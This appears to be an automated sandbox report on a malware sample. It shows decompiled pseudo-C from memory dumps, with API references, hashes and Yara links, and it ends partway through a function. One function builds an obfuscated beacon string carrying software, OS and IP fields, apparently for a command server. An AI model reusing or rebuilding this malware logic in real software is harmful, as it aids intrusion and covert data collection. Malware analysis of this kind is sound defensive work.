Opcode Fuzzy Hash: edae3db16e28e7c3194e81b126b8b7bebc3dc2c08e39b7f6440b2d4d103355f6
Instruction Fuzzy Hash: BE61B631B006819FEF2DCE29C9846BAB3A1EB45355B64857BD485C7B94E730F842C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004023F5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023F5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x404178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4041c0 = 1;
										__eflags =  *0x4041c0;
										if( *0x4041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x404178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x404178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x40417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4041c0 = 1;
							__eflags =  *0x4041c0;
							if( *0x4041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x404178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x004023ff
0x00402402
0x00402408
0x00402426
0x00000000
0x00402426
0x00402410
0x00402419
0x0040241f
0x0040242e
0x00402431
0x00402434
0x0040243e
0x0040243e
0x00402440
0x00402443
0x00402445
0x00402445
0x00402447
0x0040244a
0x00000000
0x00000000
0x0040244c
0x0040244e
0x004024b4
0x004024b4
0x00402612
0x00000000
0x00402612
0x00402450
0x00402450
0x00402454
0x00402456
0x00402456
0x00402456
0x00402456
0x00402459
0x0040245a
0x0040245d
0x0040245d
0x00402461
0x00402465
0x00402473
0x00402473
0x0040247b
0x00402481
0x00402483
0x00402485
0x00402495
0x004024a2
0x004024a6
0x004024ab
0x004024ad
0x0040252b
0x0040252b
0x004024af
0x004024af
0x004024af
0x0040252d
0x0040252f
0x00402610
0x00402610
0x00000000
0x00402535
0x00402535
0x0040253c
0x00000000
0x00000000
0x00402542
0x00402546
0x004025a2
0x004025a4
0x004025ac
0x004025ae
0x004025b0
0x00000000
0x00000000
0x004025b2
0x004025b8
0x004025ba
0x004025bc
0x004025d1
0x004025d1
0x004025d3
0x00402602
0x00402609
0x00000000
0x00402609
0x004025d7
0x004025d8
0x004025da
0x004025dc
0x004025dc
0x004025de
0x004025e0
0x004025e2
0x004025f6
0x004025f6
0x004025f9
0x004025fb
0x004025fb
0x004025fc
0x004025fc
0x00000000
0x004025e4
0x004025e4
0x004025e4
0x004025ed
0x004025ee
0x004025f0
0x004025f2
0x004025f2
0x00000000
0x004025e4
0x004025e2
0x004025be
0x004025c5
0x004025c5
0x004025c7
0x00000000
0x00000000
0x004025c9
0x004025ca
0x004025cd
0x004025cf
0x00000000
0x00000000
0x00000000
0x004025cf
0x00000000
0x004025c5
0x00402548
0x0040254b
0x00402550
0x00000000
0x00000000
0x00402559
0x0040255b
0x00402561
0x00000000
0x00000000
0x00402567
0x0040256d
0x00000000
0x00000000
0x00402573
0x00402575
0x0040257e
0x00402582
0x00000000
0x00000000
0x00402588
0x0040258b
0x0040258d
0x00000000
0x00000000
0x00402594
0x00402596
0x00000000
0x00000000
0x00402598
0x0040259c
0x00000000
0x00000000
0x00000000
0x0040259c
0x00000000
0x00000000
0x00000000
0x00402487
0x00402487
0x00402487
0x0040248e
0x00000000
0x00000000
0x00402490
0x00402491
0x00402493
0x00000000
0x00000000
0x00000000
0x00402493
0x004024bb
0x004024bd
0x00000000
0x00000000
0x004024cd
0x004024cf
0x004024d1
0x00000000
0x00000000
0x004024d7
0x004024de
0x0040250a
0x0040250a
0x0040250c
0x0040250e
0x00402522
0x00402524
0x00000000
0x00000000
0x00000000
0x00000000
0x00402510
0x00402510
0x00402510
0x00402519
0x0040251a
0x0040251c
0x0040251e
0x0040251e
0x00000000
0x00402510
0x004024e0
0x004024e3
0x004024e5
0x004024f7
0x004024f7
0x004024fa
0x004024fc
0x004024fc
0x004024fd
0x004024fd
0x00402503
0x00000000
0x00000000
0x00000000
0x00000000
0x004024e7
0x004024e7
0x004024e7
0x004024ee
0x00000000
0x00000000
0x004024f0
0x004024f0
0x004024f1
0x00000000
0x00000000
0x00000000
0x004024f1
0x004024f3
0x004024f5
0x00402508
0x00000000
0x00000000
0x00000000
0x00402508
0x00000000
0x004024f5
0x00402467
0x0040246a
0x0040246d
0x00000000
0x00000000
0x0040246f
0x00402471
0x00000000
0x00000000
0x00000000
0x00402471
0x00402436
0x00402438
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 004024A6

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 991db7956f27616056c118c0c98971bfc5896e2f27fda0318bf4c4df878a6dc8
Instruction ID: 03c3894ebaf4ff21ce759af40df065e5a9aae77be1cc319a562eeccfac6a341a
Opcode Fuzzy Hash: 991db7956f27616056c118c0c98971bfc5896e2f27fda0318bf4c4df878a6dc8
Instruction Fuzzy Hash: 2661F930600502AFDB29CF29DFAC62673A5FB95314B24843BD942F72D1E7B9DC82865C

Uniqueness

Uniqueness Score: -1.00%

Function 044BAEEC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E044BAEEC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E044BB053(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E044BB10D(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E044BAFF8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E044BB053(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E044BB0EF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x044baef0
0x044baef1
0x044baef2
0x044baef5
0x044baef7
0x044baefa
0x044baefb
0x044baefd
0x044baefe
0x044baeff
0x044baf02
0x044baf0c
0x044bafbd
0x044bafc4
0x044bafcd
0x044baf12
0x044baf12
0x044baf18
0x044baf1e
0x044baf21
0x044baf24
0x044baf28
0x044baf2d
0x044baf32
0x044bafb2
0x00000000
0x044baf34
0x044baf34
0x044baf40
0x044baf42
0x044baf9d
0x044baf9d
0x044bafa3
0x00000000
0x044baf44
0x044baf53
0x044baf55
0x044baf56
0x044baf57
0x044baf5a
0x044baf5a
0x044baf5c
0x00000000
0x044baf5e
0x044baf5e
0x044bafa8
0x044baf60
0x044baf60
0x044baf64
0x044baf6c
0x044baf71
0x044baf76
0x044baf82
0x044baf8a
0x044baf91
0x044baf97
0x044baf9b
0x00000000
0x044baf9b
0x044baf5e
0x044baf5c
0x00000000
0x044baf42
0x044bafb6
0x044bafb6
0x044bafb6
0x044baf32
0x044bafd2
0x044bafd9

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 709e500c43a8505e05c33c73d6f89eccbcdc9b31343201228ecb71a2a7854649
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 132192729002049FDB10EF69C8809E7BBA5FF45350B46816AD99A9B245E730F915C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 004021D4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E004021D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0040233B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E004023F5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E004022E0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0040233B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E004023D7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x004021d8
0x004021d9
0x004021da
0x004021dd
0x004021df
0x004021e2
0x004021e3
0x004021e5
0x004021e6
0x004021e7
0x004021ea
0x004021f4
0x004022a5
0x004022ac
0x004022b5
0x004021fa
0x004021fa
0x00402200
0x00402206
0x00402209
0x0040220c
0x00402210
0x00402215
0x0040221a
0x0040229a
0x00000000
0x0040221c
0x0040221c
0x00402228
0x0040222a
0x00402285
0x00402285
0x0040228b
0x00000000
0x0040222c
0x0040223b
0x0040223d
0x0040223e
0x0040223f
0x00402242
0x00402242
0x00402244
0x00000000
0x00402246
0x00402246
0x00402290
0x00402248
0x00402248
0x0040224c
0x00402254
0x00402259
0x0040225e
0x0040226a
0x00402272
0x00402279
0x0040227f
0x00402283
0x00000000
0x00402283
0x00402246
0x00402244
0x00000000
0x0040222a
0x0040229e
0x0040229e
0x0040229e
0x0040221a
0x004022ba
0x004022c1

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: e279de3dac0af939908f9b90ec597c41c3b231ad52d0f367bd4c7c8b727de6f3
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 9D21B8729002049BCB10DFA9C9849A7F7A5FF48350B4681BEDD15AB2C5D774FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B87B0, Relevance: 28.7, APIs: 19, Instructions: 172
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E044B87B0(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t51;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t71;
				int _t74;
				void* _t76;
				void* _t80;
				intOrPtr _t81;
				long _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				int _t86;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t80 = __edx;
				_t22 = __eax;
				_t90 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t22 = GetTickCount();
				}
				_t23 =  *0x44bd018; // 0x4b16c72e
				asm("bswap eax");
				_t24 =  *0x44bd014; // 0x3a87c8cd
				asm("bswap eax");
				_t25 =  *0x44bd010; // 0xd8d2f808
				asm("bswap eax");
				_t26 =  *0x44bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t27 =  *0x44bd2a4; // 0x8ca5a8
				_t3 = _t27 + 0x44be633; // 0x74666f73
				_t86 = wsprintfA(_t90, _t3, 2, 0x3d132, _t26, _t25, _t24, _t23,  *0x44bd02c,  *0x44bd004, _t22);
				_t30 = E044B8616();
				_t31 =  *0x44bd2a4; // 0x8ca5a8
				_t4 = _t31 + 0x44be673; // 0x74707526
				_t34 = wsprintfA(_t86 + _t90, _t4, _t30);
				_t81 =  *0x44bd324; // 0x4d895b0
				_t87 = _t86 + _t34;
				_t93 = _t91 + 0x38;
				_a32 = E044B66DB(0x44bd00a, _t81 + 4);
				_t37 =  *0x44bd2cc; // 0x0
				_t83 = 0;
				if(_t37 != 0) {
					_t71 =  *0x44bd2a4; // 0x8ca5a8
					_t7 = _t71 + 0x44be8ad; // 0x3d736f26
					_t74 = wsprintfA(_t87 + _t90, _t7, _t37);
					_t93 = _t93 + 0xc;
					_t87 = _t87 + _t74;
				}
				_t38 =  *0x44bd2c8; // 0x0
				if(_t38 != _t83) {
					_t68 =  *0x44bd2a4; // 0x8ca5a8
					_t9 = _t68 + 0x44be8a6; // 0x3d706926
					wsprintfA(_t87 + _t90, _t9, _t38);
				}
				if(_a32 != _t83) {
					_t76 = RtlAllocateHeap( *0x44bd238, _t83, 0x800);
					if(_t76 != _t83) {
						E044B59B0(GetTickCount());
						_t45 =  *0x44bd324; // 0x4d895b0
						__imp__(_t45 + 0x40);
						asm("lock xadd [eax], ecx");
						_t49 =  *0x44bd324; // 0x4d895b0
						__imp__(_t49 + 0x40);
						_t51 =  *0x44bd324; // 0x4d895b0
						_t88 = E044B69CF(1, _t80, _t90,  *_t51);
						asm("lock xadd [eax], ecx");
						if(_t88 != _t83) {
							StrTrimA(_t88, 0x44bc294);
							_t57 =  *0x44bd2a4; // 0x8ca5a8
							_push(_t88);
							_t11 = _t57 + 0x44be252; // 0x616d692f
							_t59 = E044B5FD1(_t11);
							_v20 = _t59;
							if(_t59 != _t83) {
								_t84 = __imp__;
								 *_t84(_t88, _v4);
								 *_t84(_t76, _v0);
								_t85 = __imp__;
								 *_t85(_t76, _v32);
								 *_t85(_t76, _t88);
								_t65 = E044B515C(0xffffffffffffffff, _t76, _v32, _v28);
								_v56 = _t65;
								if(_t65 != 0 && _t65 != 0x10d2) {
									E044B5225();
								}
								HeapFree( *0x44bd238, 0, _v48);
								_t83 = 0;
							}
							HeapFree( *0x44bd238, _t83, _t88);
						}
						HeapFree( *0x44bd238, _t83, _t76);
					}
					HeapFree( *0x44bd238, _t83, _a24);
				}
				HeapFree( *0x44bd238, _t83, _t90);
				return _a12;
			}

0x044b87b0
0x044b87b0
0x044b87b5
0x044b87bb
0x044b87c5
0x044b87c7
0x044b87c7
0x044b87d4
0x044b87df
0x044b87e2
0x044b87ed
0x044b87f0
0x044b87f5
0x044b87f8
0x044b87fd
0x044b8800
0x044b880c
0x044b8819
0x044b881b
0x044b8821
0x044b8826
0x044b8831
0x044b8833
0x044b8839
0x044b883b
0x044b884b
0x044b884f
0x044b8854
0x044b8858
0x044b885b
0x044b8860
0x044b886b
0x044b886d
0x044b8870
0x044b8870
0x044b8872
0x044b8879
0x044b887c
0x044b8881
0x044b888b
0x044b888d
0x044b8894
0x044b88ac
0x044b88b0
0x044b88bc
0x044b88c1
0x044b88ca
0x044b88db
0x044b88df
0x044b88e8
0x044b88ee
0x044b88fb
0x044b8908
0x044b890e
0x044b891a
0x044b8920
0x044b8925
0x044b8926
0x044b892d
0x044b8932
0x044b8938
0x044b893e
0x044b8945
0x044b894c
0x044b8952
0x044b8959
0x044b895d
0x044b8968
0x044b896d
0x044b8973
0x044b897c
0x044b897c
0x044b898d
0x044b8993
0x044b8993
0x044b899d
0x044b899d
0x044b89ab
0x044b89ab
0x044b89bc
0x044b89bc
0x044b89ca
0x044b89db

APIs

GetTickCount.KERNEL32 ref: 044B87C7
wsprintfA.USER32 ref: 044B8814
wsprintfA.USER32 ref: 044B8831
wsprintfA.USER32 ref: 044B886B
wsprintfA.USER32 ref: 044B888B
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B88A6
GetTickCount.KERNEL32 ref: 044B88B6
RtlEnterCriticalSection.NTDLL(04D89570), ref: 044B88CA
RtlLeaveCriticalSection.NTDLL(04D89570), ref: 044B88E8
StrTrimA.SHLWAPI(00000000,044BC294,?,04D895B0), ref: 044B891A

Part of subcall function 044B5FD1: lstrlen.KERNEL32(044B8932,00000000,00000000,044B8932,616D692F,00000000), ref: 044B5FDD
Part of subcall function 044B5FD1: lstrlen.KERNEL32(?), ref: 044B5FE5
Part of subcall function 044B5FD1: lstrcpy.KERNEL32(00000000,?), ref: 044B5FFC
Part of subcall function 044B5FD1: lstrcat.KERNEL32(00000000,?), ref: 044B6007

lstrcpy.KERNEL32(00000000,?), ref: 044B8945
lstrcpy.KERNEL32(00000000,?), ref: 044B894C
lstrcat.KERNEL32(00000000,?), ref: 044B8959
lstrcat.KERNEL32(00000000,00000000), ref: 044B895D

Part of subcall function 044B515C: WaitForSingleObject.KERNEL32(00000000,751881D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 044B520E

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 044B898D
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 044B899D
HeapFree.KERNEL32(00000000,00000000,?,04D895B0), ref: 044B89AB
HeapFree.KERNEL32(00000000,?), ref: 044B89BC
HeapFree.KERNEL32(00000000,?), ref: 044B89CA

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrcpy$CountCriticalSectionTicklstrlen$AllocateEnterLeaveObjectSingleTrimWait
String ID:
API String ID: 3800513375-0
Opcode ID: 629202e6bc3358e436e756d81479b89c41d3f5d87e478e8e1b3c44b4e193365e
Instruction ID: c6d4d7b7538fc0d569def7a282597ab2f6b3bcff4f33b70136bd73a1dd3a7d27
Opcode Fuzzy Hash: 629202e6bc3358e436e756d81479b89c41d3f5d87e478e8e1b3c44b4e193365e
Instruction Fuzzy Hash: CF51CEB1900601AFFB11AFA8EC88D8BBBECEB88314B050559F448C7211D639EC16CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 044BABB5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E044BABB5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x44b0000;
				_t115 = _t139[3] + 0x44b0000;
				_t131 = _t139[4] + 0x44b0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x44b0000;
				_v16 = _t139[5] + 0x44b0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x44b0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
